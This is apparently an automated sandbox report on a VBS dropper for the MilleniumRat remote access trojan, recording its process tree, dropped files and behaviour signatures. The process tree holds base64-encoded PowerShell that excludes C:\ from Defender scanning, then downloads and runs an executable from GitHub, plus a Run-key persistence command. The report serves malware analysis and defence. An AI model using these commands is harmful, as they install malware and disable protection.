Analysis

  • max time kernel
    129s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-06-2024 09:25

General

  • Target

    d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs

  • Size

    289KB

  • MD5

    ac7f96ac94ca748354e7db225aa1a5b2

  • SHA1

    98be163399271b71337afbc716b6a313ea1941e6

  • SHA256

    d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e

  • SHA512

    862f9d5bc0d4ba27cfa7d75b4974e4eb37d30f53de883419c3e1e7c62fb525a2964e8431b5b5c91e1d2654db5446bba60320d196b148b35480eec2ed2cc26692

  • SSDEEP

    6144:Xm/uolvrxUXllOuQcTN5eZ2cH5d/ozSxCP27kbn8buCW+ZFU/Chpav1GUTs8quIr:W2svrwmuQ2yp5keCPtb8b1HZSCSDs8q/

Malware Config

Signatures

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3708
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs" /elevate
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TNuiO = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=')); Invoke-Expression -Command $TNuiO
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $unLyJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBkAGUAdgBjAHIAaQBpAGkALwBSAEEAVABUAC8AcgBhAHcALwBtAGEAaQBuAC8AYgB1AGkAbAB0AC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA=')); Invoke-Expression -Command $unLyJ
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Users\Admin\AppData\Local\Temp\xleUhZDLQGPMshedPatXqZ.exe
          "C:\Users\Admin\AppData\Local\Temp\xleUhZDLQGPMshedPatXqZ.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:624
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp924D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp924D.tmp.bat
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1932
            • C:\Windows\system32\tasklist.exe
              Tasklist /fi "PID eq 624"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4936
            • C:\Windows\system32\find.exe
              find ":"
              6⤵
                PID:3668
              • C:\Windows\system32\timeout.exe
                Timeout /T 1 /Nobreak
                6⤵
                • Delays execution with timeout.exe
                PID:3636
              • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3824
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3140
                  • C:\Windows\system32\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                    8⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:1992
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /f
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1400
                  • C:\Windows\system32\reg.exe
                    reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /f
                    8⤵
                    • Modifies registry key
                    PID:2872
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg delete HKCU\Software\ChromeUpdateCash /f
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4196
                  • C:\Windows\system32\reg.exe
                    reg delete HKCU\Software\ChromeUpdateCash /f
                    8⤵
                    • Modifies registry key
                    PID:2780
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4EC7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4EC7.tmp.bat
                  7⤵
                    PID:4732

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e9c5f9e7437285aa87e4433bc7e0f9d7

        SHA1

        2363ddac1155a065a54dc6a0fc307d86bd88246b

        SHA256

        0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520

        SHA512

        7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2

      • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

        Filesize

        1.7MB

        MD5

        65ccd6ecb99899083d43f7c24eb8f869

        SHA1

        27037a9470cc5ed177c0b6688495f3a51996a023

        SHA256

        aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

        SHA512

        533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_os3rrrzw.sl0.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tmp4EC7.tmp.bat

        Filesize

        186B

        MD5

        8fad6938408246fb24d9b2c4decf7590

        SHA1

        e57084e7fc883a790e8d579a82d5028183fa188d

        SHA256

        b221ed81c657ab46b113b008a52460e9cd8240ac7850104041ae452c5c26b839

        SHA512

        248ff24bf0f0082822c095ae6e8f361e23db73e0e096eaa21ba43eb8493256472fdaec44ff20a508f66a933333f7bd2e437217eb8618d7a3caf5e75dafffdfef

      • C:\Users\Admin\AppData\Local\Temp\tmp924D.tmp.bat

        Filesize

        289B

        MD5

        7dd52557da38777e0309b525eb846eab

        SHA1

        1a8f0142009a066e0aa08a81bce3eeb36b4379d7

        SHA256

        81967b0d53a3cb834118daed75542b0e4309ddf3715bc800a8fadd8402a3a698

        SHA512

        88beeadb54a0b48430f0fc2ce6584a63ef5523d160d39fe521dcd9face44dcc78b22637d7185995b72d0fa0b06cf98b51a913ee28392522013b9b5d60e6e4e29

      • C:\Users\Admin\AppData\Local\Temp\xleUhZDLQGPMshedPatXqZ.exe

        Filesize

        5.6MB

        MD5

        c8955a21f7c008f1a1e4cd1c4471fe14

        SHA1

        021ec08ccfb4e4719ad74cc97c6c317b64fca739

        SHA256

        0f26acbeb99a1422b245cc54268220081884d352aab589bdafb2a81aab1da079

        SHA512

        2a41bdc1b307ae0140559abe545a48c5817b221d865a18dac29eb38acab29638312f900ff77333af22419745db3b009ed4ad5fef332c24f630746155671603a5

      • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CREDIT~1

        Filesize

        116KB

        MD5

        f70aa3fa04f0536280f872ad17973c3d

        SHA1

        50a7b889329a92de1b272d0ecf5fce87395d3123

        SHA256

        8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

        SHA512

        30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

      • memory/220-9-0x0000021FFED10000-0x0000021FFED32000-memory.dmp

        Filesize

        136KB

      • memory/624-35-0x0000025773400000-0x00000257739A0000-memory.dmp

        Filesize

        5.6MB

      • memory/624-40-0x0000025775600000-0x0000025775676000-memory.dmp

        Filesize

        472KB

      • memory/624-41-0x0000025773DF0000-0x0000025773E0E000-memory.dmp

        Filesize

        120KB

      • memory/3824-51-0x000002516FEC0000-0x000002516FECA000-memory.dmp

        Filesize

        40KB

      • memory/3824-55-0x0000025170420000-0x0000025170470000-memory.dmp

        Filesize

        320KB

      • memory/3824-57-0x00000251704A0000-0x00000251704DA000-memory.dmp

        Filesize

        232KB

      • memory/3824-58-0x00000251703D0000-0x00000251703F6000-memory.dmp

        Filesize

        152KB

      • memory/3824-76-0x0000025171100000-0x0000025171112000-memory.dmp

        Filesize

        72KB

      • memory/3824-80-0x0000025171760000-0x000002517180A000-memory.dmp

        Filesize

        680KB

      • memory/3824-54-0x0000025170320000-0x00000251703D2000-memory.dmp

        Filesize

        712KB

      • memory/3824-52-0x000002516FF40000-0x000002516FFAA000-memory.dmp

        Filesize

        424KB